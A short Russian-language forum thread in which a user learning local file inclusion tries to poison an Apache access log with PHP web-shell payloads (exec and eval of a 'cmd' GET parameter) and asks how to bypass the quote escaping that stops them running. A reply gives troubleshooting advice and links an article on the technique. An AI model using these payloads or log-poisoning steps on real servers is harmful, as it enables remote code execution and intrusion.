Суть такова, записываю в лог файл который находится по /usr/local/apache/domlogs/site.com вот такой код <?php phpinfo();?> <?php exec(\$_GET['cmd']);?> <?php eval($_GET['cmd']);?> Но он не исполняется, в лог пишется вот так "\"<?php phpinfo();?>\"" "//\"<?php exec(//\\$_GET['cmd']);?>//\"" "\"<?php exec(\\$_GET['cmd']);?>\"" Я так понимаю стоит какой-то фильтр. В какую сторону копать что б обойти его ? C LFI мало знаком, вот пытаюсь освоить техники
Нужно уточнить, каким образом происходит инклуд. Код, если таковой имеется. Как данные попадают в лог файл. Хватает ли у процесса прав на чтение лога. Где происходит это действие и т.п. Судя по приведённым данным, phpinfo должен отрабатывать. Но нужно видеть весь лог файл, так как одним неверным запросом можно легко запороть лог, что будет приводить к ошибке синтаксиса для подключаемого PHP сценария. В этом случае, попробовать снова, можно будет только после ротации логов. Чтобы не затруднять себя сбором информации и ожиданием ответов в этой теме, советую ознакомиться с хорошей статьей и темой на рдтоте https://rdot.org/forum/showthread.php?t=343, за исключением нуллбайтовых техник в никсах, информация вполне актуальна на сегодняшний день.
Спасибо за ответ, буду сейчас пробовать. Если что-то пойдет не так, сделаю более развернутый отсчет со скринами и т.д